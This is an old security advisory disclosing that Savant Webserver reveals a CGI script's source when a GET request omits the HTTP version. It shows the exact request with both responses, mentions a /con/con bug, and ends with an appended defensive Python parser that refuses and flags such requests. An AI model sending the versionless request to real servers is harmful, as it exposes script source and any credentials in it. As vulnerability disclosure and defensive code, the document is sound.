MDMA Advisory #5
by Andrew Lewis aka. Wizdumb

Reading of CGI Scripts under Savant Webserver

It is possible to view the source of CGI scripts running under the Savant
Webserver by omitting the HTTP version from your request.

For example, we connect to port 80 of the server and type
"GET /cgi-bin/mdma.bat HTTP/1.0" followed by two enters, and the results are
as follows...

------------------------------------------------
HTTP/1.0 200 OK
Pragma: no-cache
Content-type: text/html
Server: Savant

phjeeeer
------------------------------------------------

However, if we just type "GET /cgi-bin/mdma.bat" followed by two enters, the
results are as follows...

------------------------------------------------
@echo off
rem CGI Script for demonstrating vulnerability
echo phjeeeer
------------------------------------------------

The vendor has been contacted and a fix is in the pipeline.

Greetz to everyone in MDMA, b0f, Vortexia, Blabber.Net's #hack, and everyone
that knows me.

Cheers,
Andrew Lewis aka. Wizdumb

PS. Savant is also affected by the /con/con bug - as if you were expecting
otherwise ;-)

--==--==--==--==-->>
wizdumb@leet.org
www.mdma.za.net/fk
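
An added example, not part of the original advisory and not Savant's code: a request-line parser that treats the HTTP version as optional, chooses the handler from the path alone so that a versionless request for a script is never served as a static file, and flags such requests in captured request lines. The /cgi-bin/ prefix as the script directory, the handler names and the sample lines are assumptions made for illustration.

```python
# Added example: hypothetical names and constructed inputs, not Savant's code.
from typing import NamedTuple, Optional

CGI_PREFIXES = ("/cgi-bin/",)  # assumption: script directory, as in the advisory's example

class Request(NamedTuple):
    method: str
    target: str
    version: Optional[str]  # None for a versionless (HTTP/0.9-style) request

def parse_request_line(line: str) -> Request:
    """Parse 'METHOD target [HTTP/x.y]'; the version token is optional."""
    parts = line.strip().split()
    if len(parts) == 2:
        return Request(parts[0], parts[1], None)
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        return Request(parts[0], parts[1], parts[2])
    raise ValueError(f"malformed request line: {line!r}")

def is_script(target: str) -> bool:
    # Drop the query string and lower-case the path: Windows file systems
    # are case-insensitive, so /CGI-BIN/ names the same directory.
    path = target.split("?", 1)[0].lower()
    return path.startswith(CGI_PREFIXES)

def choose_handler(req: Request) -> str:
    """Pick the handler from the path alone, never from the version token."""
    if is_script(req.target):
        # Policy choice in this sketch: refuse versionless requests for
        # scripts instead of letting them reach the static-file handler.
        return "execute_cgi" if req.version else "reject_400"
    return "serve_static"

def flag_versionless_script_requests(lines):
    """Detection: return request lines that ask for a script with no version."""
    hits = []
    for line in lines:
        try:
            req = parse_request_line(line)
        except ValueError:
            continue  # malformed lines are out of scope for this check
        if req.version is None and is_script(req.target):
            hits.append(line)
    return hits

# Constructed request lines for the checks above.
SAMPLE = ["GET /cgi-bin/mdma.bat HTTP/1.0", "GET /CGI-BIN/mdma.bat",
          "GET /index.html", "garbage"]
```
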